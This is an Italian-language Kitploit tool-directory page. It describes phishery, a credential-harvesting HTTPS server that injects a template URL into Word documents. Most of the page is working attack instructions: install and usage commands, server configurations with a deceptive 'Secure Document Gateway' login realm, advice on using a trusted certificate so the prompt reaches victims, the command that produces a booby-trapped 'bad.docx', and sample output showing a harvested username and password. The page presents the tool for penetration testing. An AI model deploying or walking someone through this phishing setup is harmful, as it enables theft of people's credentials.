Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
phishery — Un raccoglitore di credenziali con autenticazione di base abilitato SSL con un iniettore di URL per modelli di documenti Word. | Kitploit
Strumenti/GitHubGitHub/ryhanson/phishery
Strumenti di PhishingPhishingSicurezza WebIngegneria Sociale
GitHubryhanson/phishery

phishery

Un raccoglitore di credenziali con autenticazione di base abilitato SSL con un iniettore di URL per modelli di documenti Word.

Vedi Repository
1.0k20249 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

phishery

Phishery è un server HTTP semplice con supporto SSL, il cui scopo principale è il phishing delle credenziali tramite autenticazione di base (Basic Authentication). Phishery offre anche la possibilità di iniettare facilmente l'URL in un documento Word .docx.

Dialogo di Autenticazione di Base in Word

La potenza di phishery è meglio dimostrata impostando il modello di un documento Word a un URL phishery. Questo fa sì che Microsoft Word effettui una richiesta all'URL, mostrando all'utente finale un dialogo di autenticazione. È possibile iniettare qualsiasi file .docx con un URL utilizzando le opzioni di phishery -i [docx in input], -o [docx in output] e -u [url].

Scarica

Pacchetti specifici per sistema operativo possono essere scaricati da qui.

Installa

Estrai l'archivio e, opzionalmente, installa il binario in $PATH

root@kitploit:~
$ tar -xzvf phishery*.tar.gz
$ cd phishery*
$ cp phishery /usr/local/bin

Utilizzo

root@kitploit:~
$ phishery --help

|\   \\\\__   O         __    _      __
| \_/    o \  o  ____  / /_  (_)____/ /_  ___  _______  __
> _   (( <_ oO  / __ \/ __ \/ / ___/ __ \/ _ \/ ___/ / / /
| / \__+___/   / /_/ / / / / (__  ) / / /  __/ /  / /_/ /
|/     |/     / .___/_/ /_/_/____/_/ /_/\___/_/   \__, /
             /_/ Basic Auth Credential Harvester (____/
                 with Word Doc Template Injector

  Start the server  : phishery -s settings.json -c credentials.json
  Inject a template : phishery -u https://secure.site.local/docs -i good.docx -o bad.docx

  Options:
    -h, --help      Show usage and exit.
    -v              Show version and exit.
    -s              The JSON settings file used to setup the server. [default: "settings.json"]
    -c              The JSON file to store harvested credentials. [default: "credentials.json"]
    -u              The phishery URL to use as the Word document template.
    -i              The Word .docx file to inject with a template URL.
    -o              The new Word .docx file with the injected template URL.
Esecuzione del server

Modifica il file settings.json fornito come necessario; di default dovrebbe apparire così:

root@kitploit:~
{
  "ip": "0.0.0.0",
  "port": "443",
  "sslCert": "server.crt",
  "sslKey": "server.key",
  "basicRealm": "Secure Document Gateway",
  "responseStatus": 200,
  "responseFile": "template.dotx",
  "responseHeaders": [
    ["Content-Type", "application/vnd.openxmlformats-officedocument.wordprocessingml.template"]
  ]
}

Questa configurazione avvierà il server HTTP sulla porta 443 con SSL configurato per utilizzare server.crt e server.key. Il realm di autenticazione di base è impostato su Secure Document Gateway. Quando vengono fornite delle credenziali, viene inviato uno stato di risposta 200 insieme al contenuto del file template.dotx incluso e l'intestazione Content-Type: Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.template.

Il file delle impostazioni può anche essere configurato per restituire un corpo semplice, utilizzando responseBody, come in questo esempio:

root@kitploit:~
{
  "ip": "0.0.0.0",
  "port": "443",
  "sslCert": "server.crt",
  "sslKey": "server.key",
  "basicRealm": "Secure Document Gateway",
  "responseStatus": 404,
  "responseBody": "<h1>Not Found</h1>",
  "responseHeaders": [
    ["Content-Type", "text/html"]
  ]
}

L'efficacia di questo strumento si basa principalmente sul dominio e sul realm di autenticazione di base utilizzati, poiché spesso è tutto ciò che l'utente finale vedrà quando viene attivato da un documento Office. Assicurati di puntare i tuoi record DNS A all'IP pubblico del server phishery.

Si consiglia di sostituire il certificato fornito con uno attendibile, ad esempio uno generato con LetsEncrypt. Microsoft Word su OS X impedirà il dialogo di autenticazione se il certificato non è valido, e Microsoft Word su Windows chiederà all'utente di accettare il certificato non valido.

Una volta configurato e in esecuzione il server, tutto ciò che devi fare è incorporare un URL phishery in un documento, o ovunque altro tu desideri. phishery ti offre la possibilità di iniettare il tuo URL in un documento Word come modello; le istruzioni su come fare sono riportate di seguito.

Iniezione di un documento Word

Per iniettare un documento Word con un URL modello, avrai bisogno di un file .docx e dell'URL del server phishery.

Ora esegui phishery con il tuo documento e l'URL:

root@kitploit:~
$ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx
[+] Opening Word document: good.docx
[+] Setting Word document template to: https://secure.site.local/docs
[+] Saving injected Word document to: bad.docx
[*] Injected Word document has been saved!

Assicurati che il tuo server phishery sia in esecuzione e raggiungibile all'URL che hai usato. Ora quando il documento Word viene aperto, alla vittima verrà mostrato un dialogo di autenticazione.

Quando la vittima apre il documento, vedrai quanto segue:

root@kitploit:~
$ ./phishery
[+] Credential store initialized at: credentials.json
[+] Starting HTTPS Auth Server on: 0.0.0.0:443
[*] Request Received at 2016-09-25 01:06:28: HEAD https://secure.site.local/docs
[*] Sending Basic Auth response to: 127.0.0.1
[*] New credentials harvested!
[HTTP] Host        : secure.example.local
[HTTP] Request     : /docs
[HTTP] User Agent  : Microsoft Office Word
[HTTP] IP Address  : 127.0.0.1
[AUTH] Username    : john.doe
[AUTH] Password    : Summer15
Scarica lo strumento